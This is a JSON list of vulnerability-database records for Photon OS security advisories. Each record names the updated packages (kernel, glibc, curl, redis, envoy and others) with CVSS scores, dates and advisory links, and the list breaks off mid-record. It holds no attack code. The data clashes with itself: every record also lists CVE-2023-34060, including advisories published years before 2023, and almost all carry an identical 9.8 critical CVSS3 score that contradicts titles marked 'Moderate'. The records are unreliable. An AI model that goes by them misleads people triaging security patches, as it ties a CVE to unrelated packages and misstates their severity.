{"lastseen": "2023-11-28T18:21:35", "description": "Updates of ['linux-aws', 'linux-esx', 'linux', 'linux-secure'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2022-11-18T00:00:00", "type": "photon", "title": "Important Photon OS Security Update - PHSA-2022-0542", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-43750", "CVE-2023-34060"], "modified": "2022-11-18T00:00:00", "id": "PHSA-2022-0542", "href": "https://github.com/vmware/photon/wiki/Security-Update-2.0-542", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-28T17:50:04", "description": "Updates of ['python3-babel'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2021-11-04T00:00:00", "type": "photon", "title": "Important Photon OS Security Update - PHSA-2021-4.0-0123", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42771", "CVE-2023-34060"], "modified": "2021-11-04T00:00:00", "id": "PHSA-2021-4.0-0123", "href": "https://github.com/vmware/photon/wiki/Security-Update-4.0-123", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-28T18:47:43", "description": "Updates of ['ncurses'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2021-10-20T00:00:00", "type": "photon", "title": "Important Photon OS Security Update - PHSA-2021-0445", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-39537", "CVE-2023-34060"], "modified": "2021-10-20T00:00:00", "id": "PHSA-2021-0445", "href": "https://github.com/vmware/photon/wiki/Security-Update-1.0-445", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-28T18:48:45", "description": "Updates of ['cpio'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2021-09-04T00:00:00", "type": "photon", "title": "Important Photon OS Security Update - PHSA-2021-0432", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38185", "CVE-2023-34060"], "modified": "2021-09-04T00:00:00", "id": "PHSA-2021-0432", "href": "https://github.com/vmware/photon/wiki/Security-Update-1.0-432", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-28T18:52:38", "description": "Updates of ['glibc'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2020-12-03T00:00:00", "type": "photon", "title": "Moderate Photon OS Security Update - PHSA-2020-0343", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-7309", "CVE-2023-34060"], "modified": "2020-12-03T00:00:00", "id": "PHSA-2020-0343", "href": "https://github.com/vmware/photon/wiki/Security-Update-1.0-343", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-28T18:49:31", "description": "Updates of ['envoy'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2021-06-19T00:00:00", "type": "photon", "title": "Critical Photon OS Security Update - PHSA-2021-0405", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-29492", "CVE-2023-34060"], "modified": "2021-06-19T00:00:00", "id": "PHSA-2021-0405", "href": "https://github.com/vmware/photon/wiki/Security-Update-1.0-405", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-28T18:50:54", "description": "Updates of ['redis'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2021-04-13T00:00:00", "type": "photon", "title": "Moderate Photon OS Security Update - PHSA-2021-0380", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3470", "CVE-2023-34060"], "modified": "2021-04-13T00:00:00", "id": "PHSA-2021-0380", "href": "https://github.com/vmware/photon/wiki/Security-Update-1.0-380", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-28T18:50:51", "description": "Updates of ['c-ares'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2021-04-07T00:00:00", "type": "photon", "title": "Important Photon OS Security Update - PHSA-2021-0378", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8277", "CVE-2023-34060"], "modified": "2021-04-07T00:00:00", "id": "PHSA-2021-0378", "href": "https://github.com/vmware/photon/wiki/Security-Update-1.0-378", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-28T18:51:49", "description": "Updates of ['PyYAML'] packages of Photon OS have been released.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-22T00:00:00", "type": "photon", "title": "Critical Photon OS Security Update - PHSA-2021-0361", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14343", "CVE-2023-34060"], "modified": "2021-02-22T00:00:00", "id": "PHSA-2021-0361", "href": "https://github.com/vmware/photon/wiki/Security-Update-1.0-361", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-11-28T18:47:08", "description": "Updates of ['expat'] packages of Photon OS have been released.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-02T00:00:00", "type": "photon", "title": "Critical Photon OS Security Update - PHSA-2022-0466", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-23852", "CVE-2023-34060"], "modified": "2022-02-02T00:00:00", "id": "PHSA-2022-0466", "href": "https://github.com/vmware/photon/wiki/Security-Update-1.0-466", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-28T18:46:15", "description": "Updates of ['cassandra'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2022-02-21T00:00:00", "type": "photon", "title": "Critical Photon OS Security Update - PHSA-2022-0474", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44521", "CVE-2023-34060"], "modified": "2022-02-21T00:00:00", "id": "PHSA-2022-0474", "href": "https://github.com/vmware/photon/wiki/Security-Update-1.0-474", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-11-28T18:51:43", "description": "Updates of ['atftp'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2021-01-24T00:00:00", "type": "photon", "title": "Important Photon OS Security Update - PHSA-2021-0357", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-6097", "CVE-2023-34060"], "modified": "2021-01-24T00:00:00", "id": "PHSA-2021-0357", "href": "https://github.com/vmware/photon/wiki/Security-Update-1.0-357", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-28T18:44:05", "description": "Updates of ['unzip'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2018-06-01T00:00:00", "type": "photon", "title": "Important Photon OS Security Update - PHSA-2018-0052", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-1000035", "CVE-2023-34060"], "modified": "2018-06-01T00:00:00", "id": "PHSA-2018-0052", "href": "https://github.com/vmware/photon/wiki/Security-Update-2.0-52", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-28T18:17:12", "description": "Updates of ['WALinuxAgent'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2020-05-14T00:00:00", "type": "photon", "title": "Moderate Photon OS Security Update - PHSA-2020-3.0-0090", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0804", "CVE-2023-34060"], "modified": "2020-05-14T00:00:00", "id": "PHSA-2020-3.0-0090", "href": "https://github.com/vmware/photon/wiki/Security-Update-3.0-90", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-28T18:55:55", "description": "Updates of ['bash'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2020-02-15T00:00:00", "type": "photon", "title": "Important Photon OS Security Update - PHSA-2020-0277", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-18276", "CVE-2023-34060"], "modified": "2020-02-15T00:00:00", "id": "PHSA-2020-0277", "href": "https://github.com/vmware/photon/wiki/Security-Update-1.0-277", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-28T19:00:13", "description": "Updates of ['curl'] packages of Photon OS have been released.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-09-19T00:00:00", "type": "photon", "title": "Critical Photon OS Security Update - PHSA-2018-0186", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-0500", "CVE-2023-34060"], "modified": "2018-09-19T00:00:00", "id": "PHSA-2018-0186", "href": "https://github.com/vmware/photon/wiki/Security-Update-1.0-186", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-28T18:55:23", "description": "Updates of ['envoy'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2020-04-02T00:00:00", "type": "photon", "title": "Moderate Photon OS Security Update - PHSA-2020-0286", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8660", "CVE-2023-34060"], "modified": "2020-04-02T00:00:00", "id": "PHSA-2020-0286", "href": "https://github.com/vmware/photon/wiki/Security-Update-1.0-286", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-27T17:39:02", "description": "Updates of ['etcd'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2023-05-25T00:00:00", "type": "photon", "title": "Moderate Photon OS Security Update - PHSA-2023-4.0-0398", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-32082", "CVE-2023-34060"], "modified": "2023-05-25T00:00:00", "id": "PHSA-2023-4.0-0398", "href": "https://github.com/vmware/photon/wiki/Security-Update-4.0-398", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-27T17:39:17", "description": "Updates of ['bazel'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2023-05-22T00:00:00", "type": "photon", "title": "Moderate Photon OS Security Update - PHSA-2023-4.0-0396", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-3474", "CVE-2023-34060"], "modified": "2023-05-22T00:00:00", "id": "PHSA-2023-4.0-0396", "href": "https://github.com/vmware/photon/wiki/Security-Update-4.0-396", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-27T17:39:10", "description": "Updates of ['bluez'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2023-05-17T00:00:00", "type": "photon", "title": "Moderate Photon OS Security Update - PHSA-2023-4.0-0392", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-27349", "CVE-2023-34060"], "modified": "2023-05-17T00:00:00", "id": "PHSA-2023-4.0-0392", "href": "https://github.com/vmware/photon/wiki/Security-Update-4.0-392", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-27T17:43:13", "description": "Updates of ['tpm2-tools'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": 